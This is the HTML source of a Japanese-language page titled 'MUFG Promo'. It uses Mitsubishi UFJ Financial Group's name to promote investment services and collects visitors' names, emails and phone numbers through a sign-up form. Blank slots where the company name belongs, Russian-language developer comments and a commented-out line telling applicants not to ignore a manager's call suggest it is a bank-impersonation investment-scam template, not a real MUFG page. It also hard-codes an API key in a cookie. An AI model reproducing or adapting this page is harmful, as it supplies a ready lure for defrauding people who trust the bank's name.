<!DOCTYPE html>
<html lang="ja">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MUFG Promo</title>
    <link rel="stylesheet" href="../assets/css/style.css">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons/font/bootstrap-icons.css" rel="stylesheet">
    <link rel="shortcut icon" href="../assets/images/favicon.ico">
    <link rel="icon" sizes="16x16 32x32 64x64" href="../assets/images/favicon.ico">
    <link rel="icon" type="image/png" sizes="32x32" href="../assets/images/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="../assets/images/favicon-16x16.png">
    <link rel="apple-touch-icon" href="../assets/images/apple-touch-icon.png">
   <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.12/css/intlTelInput.css" rel="stylesheet" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.12/js/intlTelInput.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.11/jquery.mask.js"></script>

</head>
<body>
    <section class="first">

    <div class="stars">

    </div>

    <div class="container">
        <div class="logo">
            <div class="containerl">
                <div class="top">
                    <a href="#form" class="icon">
                                      <img src="../assets/images/ll.png" alt=""style="width: 100%;">
                    <!--<i class="bi bi-tropical-storm"></i>-->
                    </a>
                </div>
                <div class="box">
                    <span style="--i:0"></span>
                    <span style="--i:1"></span>
                    <span style="--i:2"></span>
                    <span style="--i:3"></span>
                </div>
            </div>
                <!-- <img src="serhii.png" alt="MUFG"> -->
            <!-- <img src="7.png" alt="MUFG"> -->
            <span>MUFG</span>
        </div>

<h1>三菱UFJフィナンシャル・グループ: あなたの財務解決策は私たちの使命です</h1>

    <div class="star-container">
        <div class="plus-star"></div>
    </div>

<p class="subtext">三菱UFJフィナンシャル・グループ（）は、個人および法人のお客様に向けた投資と資産管理の幅広い機会を提供し、長期的な安定性を重視しています。</p>


    
        <br>
        <p class="description">私たちは、お客様一人ひとりが唯一無二の存在であることを理解し、それぞれのニーズに合わせたソリューションを提供します。その内容には以下が含まれます：</p>


        <div class="info-box example-1">
            <div class="inner">
                
        が提供する投資口座および銀行商品を通じた投資
            </div>
    </div>

    <div class="info-box example-1">
            <div class="inner">
        の専門的なファイナンシャルアドバイザーとの相談を通じて、財務目標を達成するための最適な戦略とツールの選択        
            </div>
    </div>
    <div class="info-box example-1">
            <div class="inner">
            が組織するファンドや共同投資プロジェクトへの参加    
            </div>
    </div>
    <div class="info-box example-1">
            <div class="inner">
                
                私たちの使命は、変化する市場環境の中でお客様の資本の安定的な成長を支援するための総合的な解決策を提供することです。専門チーム、グローバルネットワーク、先端技術を駆使して、お客様に大きな財務成果をもたらす機会をご提供します。
            </div>
    </div>
     <div class="info-box example-1">
            <div class="inner">
                
                もっと詳しく知りたい方へとの連携や私たちが提供するさまざまな特典を活用する方法について知りたい方は、ぜひ当グループの専門家にお問い合わせください。お客様が投資の第一歩を踏み出せるよう、心を込めてサポートいたします。
            </div>
    </div>

    </div>


    </section>
    <section class="second ">
        <div class="container2">

                <span class="form-title gradient-text">以下のフォームからご登録いただけます：</span>
            <!-- <span class="form-title">以下のフォームからご登録いただけます：</span> -->

    <form action="/send" method="POST" id="form" onsubmit="return checkbtn(event)" class="form-container animated">
        <input type="text" name="first_name" placeholder="お名前" required="">
        <input type="text" name="last_name" placeholder="苗字" required="">
        <input type="email" name="email" placeholder="メールアドレス" required="">
        <input type="tel" name="phone" placeholder="電話番号" required="">
        <br style="margin-bottom: 15px;">
        <!--<button type="submit">登録する</button>-->
        <!-- <p>Если у тебя уже есть аккаунт нажми сюда <a id="openDialog"></a></p> -->
        <div class="gradient-button example-2">
            <button id="fill" class="inner2"> 登録する
            </button>

        </div>
        <!-- <p>📞 重要！ご応募いただいた後、弊社マネージャーより確認のご連絡を差し上げます。</p>
        <p>お電話は数分で終わります。無視しないでください！</p> -->

 
        <p>私たちのチームが、お客様に最適な解決策を見つけるための必要な支援を喜んで提供いたします。</p>
    </form>
        </div>

        <script>
            document.cookie = "api_key=ba67df6a-a17c-476f-8e95-bcdb75ed3958"; 
        </script>
        <div class="logo" style="display: flex; justify-content: center; color: white;">
            <div class="containerl">
                <div class="top">
                    <a href="#" class="icon">
                <img src="../assets/images/ll.png" alt=""style="width: 100%;"></a>
                </div>
                <div class="box">
                    <span style="--i:0"></span>
                    <span style="--i:1"></span>
                    <span style="--i:2"></span>
                    <span style="--i:3"></span>
                </div>
            </div>
                <!-- <img src="serhii.png" alt="MUFG"> -->
            <!-- <img src="7.png" alt="MUFG"> -->
            <span>MUFG</span>
        </div>
    </section>


</body>

<script src="../assets/js/script.js"></script>
</html>